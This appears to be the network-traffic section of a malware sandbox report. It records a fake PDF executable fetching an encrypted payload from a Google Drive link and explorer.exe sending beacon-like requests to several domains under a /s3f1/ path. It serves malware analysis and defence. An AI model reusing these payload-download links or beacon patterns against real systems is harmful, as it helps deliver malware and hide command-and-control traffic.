                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              6192.168.11.2049819107.178.157.22580C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2021 15:10:54.274463892 CET459OUTGET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1
                                                                                                              Host: www.thaicharuen.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              7192.168.11.204982135.198.112.8580C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2021 15:11:36.580027103 CET468OUTGET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1
                                                                                                              Host: www.morningstarapparel.space
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2021 15:11:36.749105930 CET468INHTTP/1.1 301 Moved Permanently
                                                                                                              cache-control: public, max-age=0, must-revalidate
                                                                                                              content-length: 58
                                                                                                              content-type: text/plain
                                                                                                              date: Wed, 24 Nov 2021 14:11:36 GMT
                                                                                                              age: 0
                                                                                                              location: https://www.morningstarapparel.space/s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP
                                                                                                              x-nf-request-id: 01FN94K80BGZ7XXDH5V7C82BDN
                                                                                                              server: Netlify
                                                                                                              Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 6f 72 6e 69 6e 67 73 74 61 72 61 70 70 61 72 65 6c 2e 73 70 61 63 65 2f 73 33 66 31 2f 0a
                                                                                                              Data Ascii: Redirecting to https://www.morningstarapparel.space/s3f1/


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              8192.168.11.204982270.40.220.12380C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2021 15:12:17.503062010 CET470OUTGET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1
                                                                                                              Host: www.soarlikeaneagle.site
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2021 15:12:17.663027048 CET470INHTTP/1.1 404 Not Found
                                                                                                              Date: Wed, 24 Nov 2021 14:12:17 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 315
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              9192.168.11.20498233.64.163.5080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 24, 2021 15:12:36.076911926 CET471OUTGET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1
                                                                                                              Host: www.evaccines.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Nov 24, 2021 15:12:36.088320017 CET472INHTTP/1.1 410 Gone
                                                                                                              Server: openresty
                                                                                                              Date: Wed, 24 Nov 2021 14:12:22 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 64 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 65 76 61 63 63 69 6e 65 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 39 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 65 76 61 63 63 69 6e 65 73 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7<html>9 <head>4d <meta http-equiv='refresh' content='5; url=http://www.evaccines.com/' />a </head>9 <body>39 You are being redirected to http://www.evaccines.coma </body>8</html>0


                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.11.2049805142.250.185.110443C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-11-24 14:07:31 UTC0OUTGET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Host: drive.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-11-24 14:07:32 UTC0INHTTP/1.1 302 Moved Temporarily
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Wed, 24 Nov 2021 14:07:32 GMT
                                                                                                              Location: https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download
                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                              Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                                                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                                                                              Content-Security-Policy: script-src 'nonce-8Nz1aj+dRslqOdTYTWipqw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Server: GSE
                                                                                                              Set-Cookie: NID=511=qDoaMAIU0O04ihPSnMFUKHKhZjD_5Vibr7Nm30ISQliCoezrNDEf4HL2Sn7XymRTaJwq-jn_BUnRoCmfDMdRD-BZ6Ji3pgJOij0Ebs8oId5kwa6xLQ8z0exq8NTnHnMmjAH_19djgXOVXfCRMw2vQKWMSmn_f_EDO5yvU-mdf8g; expires=Thu, 26-May-2022 14:07:31 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                              Accept-Ranges: none
                                                                                                              Vary: Accept-Encoding
                                                                                                              Connection: close
                                                                                                              Transfer-Encoding: chunked
                                                                                                              2021-11-24 14:07:32 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 31 34 2d 35 73 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 6e 71 66 64
                                                                                                              Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfd
                                                                                                              2021-11-24 14:07:32 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.11.2049806142.250.186.97443C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-11-24 14:07:32 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: doc-14-5s-docs.googleusercontent.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2021-11-24 14:07:32 UTC2INHTTP/1.1 200 OK
                                                                                                              X-GUploader-UploadID: ADPycdtENFQgfeQ3Qdi39JZStFrIQZP2HWI7D0FrvZ9w1lBTDCTsIEuJYvCRyG4EvJZzWFzrGwrbaMWP2KYRBZPuIP0
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                                                              Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Content-Disposition: attachment;filename="son of mercy_PLdsuNJGz44.bin";filename*=UTF-8''son%20of%20mercy_PLdsuNJGz44.bin
                                                                                                              Content-Length: 189504
                                                                                                              Date: Wed, 24 Nov 2021 14:07:32 GMT
                                                                                                              Expires: Wed, 24 Nov 2021 14:07:32 GMT
                                                                                                              Cache-Control: private, max-age=0
                                                                                                              X-Goog-Hash: crc32c=B80/OQ==
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                              Connection: close
                                                                                                              2021-11-24 14:07:32 UTC6INData Raw: c3 0c 32 ba e6 e0 c2 ae 91 99 e4 88 2a d2 d9 20 4b 74 3d a5 09 2d 41 51 02 06 fd 9b f0 99 07 79 2f 07 98 dd 31 2d 35 ec 30 5f ab f2 d5 24 47 55 98 8c e1 c9 6b 7b 11 f0 0b 95 2b 65 dd cc 2f 77 e7 b9 23 ee db 85 6a e0 4c 50 c7 e8 09 23 2c 01 14 2b 54 66 a5 7f b0 2f c6 4d 73 8b f5 a6 8b 5c 3e 3e 22 e0 1d e7 b3 52 13 1d 58 61 48 81 af 7b ac 63 bb 55 4f ef b1 ed 59 a3 61 9c de 48 a4 0d 5f 02 f0 b3 a0 89 dd 7f a6 69 f8 7f 9c eb ca 18 a2 41 67 54 18 21 77 dc 4b 2c 25 7f aa 92 b8 21 96 c9 c7 36 08 4d e0 a4 70 a2 d6 85 e0 e9 82 01 2a 1d 6b 31 0d 51 d7 78 ef 5b 68 a3 22 01 51 53 45 51 14 c8 6c 1f 6a 4b c8 b1 61 73 5f 9c 1d 6d 5e e3 ab 11 82 b4 3d a5 af d0 da cc e1 f5 68 d8 ae 22 9a 93 4c f3 f8 bb c9 b1 54 d3 51 70 8b b2 14 6b 3b 5b a5 eb a7 90 e3 6c 6a 3f f7 2b 23
                                                                                                              Data Ascii: 2* Kt=-AQy/1-50_$GUk{+e/w#jLP#,+Tf/Ms\>>"RXaH{cUOYaH_iAgT!wK,%!6Mp*k1Qx[h"QSEQljKas_m^=h"LTQpk;[lj?+#
                                                                                                              2021-11-24 14:07:32 UTC9INData Raw: 5a 10 fb 5b 22 77 af 73 e9 09 e5 05 07 49 1b 63 82 b4 18 7a 20 4e 3f 15 68 2f da b2 7d 15 a3 6e be 09 fb bf ea 78 7e 12 7b 02 13 fb eb 2f 40 39 97 32 c7 2b df 99 1c eb 40 ee 73 3e a1 7d 93 15 b0 3d 3b 4e f3 13 cc b6 52 3e 7e ae 6d 9d 1a 48 9a 76 77 df 8f dd 4b c6 ed a2 db f3 a1 47 7b da 87 9d bd a3 1e b9 de 97 22 67 e3 6f c0 bb 0f 3a f1 82 f1 2d ae 82 57 42 1a 02 87 82 ed 2f 3a c7 95 d6 d1 23 4b b1 5b eb c0 04 32 c0 78 ac 89 d0 a0 3b 3b 24 5c 3d 07 77 d6 d8 a9 18 e2 82 27 23 59 87 ba 8f 2b 8a 8f 35 af 6e 86 70 1d de 6a 16 38 a2 4a 54 78 65 51 1f ec 58 fb f6 98 be 12 29 aa 77 d1 b8 23 ca 1a c6 50 1a 32 18 14 5f 4b 6e 9a d4 1f db c7 09 19 d7 4d bb fa bb ea 74 47 80 db b0 63 2e a2 82 f9 72 2a 9e ea 0f c4 aa 07 31 28 64 f2 e4 90 cc 4c 72 ed e7 91 46 1f 2a 16
                                                                                                              Data Ascii: Z["wsIcz N?h/}nx~{/@92+@s>}=;NR>~mHvwKG{"go:-WB/:#K[2x;;$\=w'#Y+5npj8JTxeQX)w#P2_KnMtGc.r*1(dLrF*
                                                                                                              2021-11-24 14:07:32 UTC13INData Raw: 22 d4 49 4a 14 6b 66 2a 54 0b 86 e0 4b 42 10 1d a8 e0 30 df d0 16 b8 71 48 f1 02 48 40 a3 1a cb 06 58 9e ec a6 5a f4 9d a7 bc 8b ef 97 8e 10 bd 80 fd c3 9b ce 71 4c 82 6f b6 86 2d d6 b0 e1 10 6c 60 ab 4b e2 b6 7f 96 a5 b8 e5 4f c2 14 e2 a8 55 b3 19 92 db 69 04 44 44 81 8a 65 55 0a 32 42 bb e4 f6 17 3d 6a 68 c1 4a 1a e7 57 93 19 62 3a 08 f7 80 00 be bd 11 8b 0d b7 6a f9 dc a9 29 48 52 cb 70 85 96 57 3a 70 04 c0 2f 49 29 10 e8 54 1e 07 59 1c f8 8e 5e b0 c5 64 73 f6 67 90 7e 3d d6 2b bb dc 94 a3 68 ec 40 1d df c6 e0 d1 3c 49 0c 7e b9 8d 03 d7 26 b4 b0 43 18 b9 00 e8 b4 9d 43 41 94 a9 9a ce 6e c3 e1 99 b9 63 2f ab 72 c3 57 a5 ef de b1 c8 b8 68 f6 09 f4 1a fa a8 2c 7e a9 45 31 fc 87 df b1 b1 6f 12 db 1d 37 95 e8 5c 91 57 a7 55 f8 2d fd 92 ef 84 fd 0b f3 e3 3f
                                                                                                              Data Ascii: "IJkf*TKB0qHH@XZqLo-l`KOUiDDeU2B=jhJWb:j)HRpW:p/I)TY^dsg~=+h@<I~&CCAnc/rWh,~E1o7\WU-?
                                                                                                              2021-11-24 14:07:32 UTC17INData Raw: d5 b7 47 5a 5b a7 c2 ab 2c b5 4a d4 19 cd cb 33 0c 1e ec ec 45 dd bb 94 ab 25 8b d0 4c 4c cb b7 ab dc b3 2c c3 c6 3e 44 3c 4f 12 8a ec 6c cf fb f6 e5 a7 b2 48 f0 ec 98 6d ca a6 6f 3e 72 eb dd f5 1f 72 1b f9 1c f7 7a d3 2e 9f 46 8c 2e 2e 57 a6 c4 05 88 95 25 e4 4d cc 4f 37 73 2a 94 a7 2b e0 55 ac cc bb a9 c9 fe 9b 7c aa 62 eb 2a 4b de 34 0d e2 3a 2b a0 86 f8 70 55 22 ad fd f4 bb 99 ce 78 ec 15 96 f0 2e c0 4c ba 1c 48 19 2e 95 a9 e1 aa 94 96 af a1 73 93 1b 10 23 a7 73 15 d3 ef 10 0a da 27 c7 0f d2 86 94 1a f8 ea fa 89 22 27 cb 16 5b 01 3d a5 f9 dd 5b 4c 76 e5 6e 03 01 99 61 39 91 44 1c 2a 89 11 a7 b2 64 3d f3 96 3b 53 e8 39 16 47 9b ec 6b a6 4e 61 1f c2 38 d0 5b 44 59 7e e9 ac e7 6a bb 6d 98 d3 48 40 99 49 e6 92 73 f3 4c 66 d3 c2 ab 1d 01 9f 16 db 16 f5 45
                                                                                                              Data Ascii: GZ[,J3E%LL,>D<OlHmo>rrz.F..W%MO7s*+U|b*K4:+pU"x.LH.s#s'"'[=[Lvna9D*d=;S9GkNa8[DY~jmH@IsLfE
                                                                                                              2021-11-24 14:07:32 UTC18INData Raw: 94 40 91 be 09 fb 8c 9e e0 7a 21 0a 16 98 a6 13 ee bb 29 56 cd cf aa 3c 66 1c eb 40 65 2f a6 a5 fc 74 ea b0 3d 3b c5 8f ab c8 77 99 36 bf 61 7d ae c5 c3 e7 8a f6 38 70 dd 4b c6 66 de 63 f7 60 80 73 e9 58 16 c0 4f df 46 c6 16 c5 98 e3 6f c0 88 53 82 f5 09 8c d1 9d db 4f 83 e5 0a 0e df 19 a4 67 37 54 2d c1 a2 ac 4e 5b eb c0 8f 4e 78 7c 2d 6a 2f a0 3b 3b af 00 a5 03 b6 19 c8 68 d3 ea b1 dc a8 04 6b 3b 6c d4 8a 8f 35 24 32 1e 74 dc 1d 62 25 c3 29 17 ac b9 9e 49 9e 0f a7 fb f6 98 8d 6e b1 ae f4 10 98 10 b3 e6 4f 2d e2 b9 65 1c 8e b4 21 13 a9 17 d4 43 71 1b d7 4d 50 fc 36 71 74 47 80 db 3b 1e da 63 7d f1 f3 cd 61 ea 0f c4 21 7b 89 2c a5 3d f4 1b 12 8d 89 fd 66 72 b9 1f 2a 16 af 19 0c 3c 32 10 4f fc 68 36 0f d2 f1 e0 42 1c 3c 06 21 bf fe b8 f2 46 62 d3 b7 83 9e
                                                                                                              Data Ascii: @z!)V<f@e/t=;w6a}8pKfc`sXOFoSOg7T-N[Nx|-j/;;hk;l5$2tb%)InO-e!CqMP6qtG;c}a!{,=fr*<2Oh6B<!Fb
                                                                                                              2021-11-24 14:07:32 UTC19INData Raw: 4f d2 71 1b d7 f6 bf 94 1a 4e dc e7 8c 31 e7 95 1b cf 4d 35 61 6d 7c dc 41 b1 a0 b6 a5 a9 ef ac af 82 c8 67 77 e2 01 9f 74 40 8d 96 6d 0e 4a 24 5b 48 6d 6e 5c 27 25 f8 f4 37 b5 c8 42 95 44 51 68 64 46 6d 23 c0 eb 43 d7 36 87 8c 36 19 ed f7 5e de 33 c3 a7 3b f6 9d db 97 2f 1e 17 c8 f0 5b d7 c2 fd 5d e2 05 bc af a3 8d fe 43 7c 93 9c 0a 10 ab 46 1b 1f 49 80 58 30 7d 3c 25 9e 43 e0 d4 6e 88 a0 b5 c9 84 b8 71 c5 c1 10 7a 79 f8 2c d3 b5 21 07 bf 94 6b 70 ce cf 57 63 e3 ed 22 99 fc 00 4b 01 a1 b8 39 aa 28 86 ed 15 bb 44 26 d8 ff c9 b7 b3 74 a7 4e e4 f0 c9 75 27 33 16 e8 7c 5c e0 b4 c9 55 09 4e f0 59 44 f7 c0 ba a7 50 d1 92 c1 de 72 93 08 e7 29 2c e2 bc 7d e5 1c f3 99 0d 65 9e 76 b2 aa e8 3f d4 e0 c1 71 e5 b8 eb c3 22 e1 7d 3a e3 5a ee c3 6a d9 db a5 af dc 6c f7
                                                                                                              Data Ascii: OqN1M5am|Agwt@mJ$[Hmn\'%7BDQhdFm#C66^3;/[]C|FIX0}<%Cnqzy,!kpWc"K9(D&tNu'3|\UNYDPr),}ev?q"}:Zjl
                                                                                                              2021-11-24 14:07:32 UTC20INData Raw: 27 21 16 24 13 c6 6f 1b c3 49 cf 93 3e 96 26 2f 5d e6 97 d9 5b 69 bc 38 04 37 85 6a e0 17 83 a1 5d c3 9b 24 d9 5f f2 82 a5 b5 3b cd b8 82 ce 4c 19 38 48 41 09 b5 d2 73 b6 4a 6c ce 5a 98 aa 80 66 48 81 24 fd b8 43 bb 55 cc 17 b3 99 5c 20 99 98 6b 37 c2 ca 14 15 7b bd c6 fa 91 4e b5 d1 72 b5 71 ea 9e 70 98 f4 c3 1c b6 0a 12 ae 2a ca 8b 3c eb fc d6 1f 6f 7f 3d 37 28 3f c7 47 cf 17 fc a7 a4 f5 39 7d c5 73 0f df a5 48 fa 72 cb d8 ac af a1 f9 53 26 eb 20 59 2a 68 8a 8f 0a 23 59 20 47 f5 fd 11 d4 fa b0 8e 90 ad 28 5b 97 d4 b4 33 75 0d e3 98 41 7a 22 61 7b c8 69 dc 50 c8 8f df 8b 96 ec ed 88 d0 4b fc dd b1 cb a7 90 e3 6c 6a 3f ac 74 7d 83 85 b8 ec 9d dc 6e 28 41 ed 84 bb c5 19 88 5c 6d c2 e9 0b 49 3e 98 d1 05 a2 a4 16 bf ff 26 48 a2 84 c2 ea e0 90 dc ec 55 58 5b
                                                                                                              Data Ascii: '!$oI>&/][i87j]$_;L8HAsJlZfH$CU\ k7{Nrqp*<o=7(?G9}sHrS& Y*h#Y G([3uAz"a{iPKlj?t}n(A\mI>&HUX[
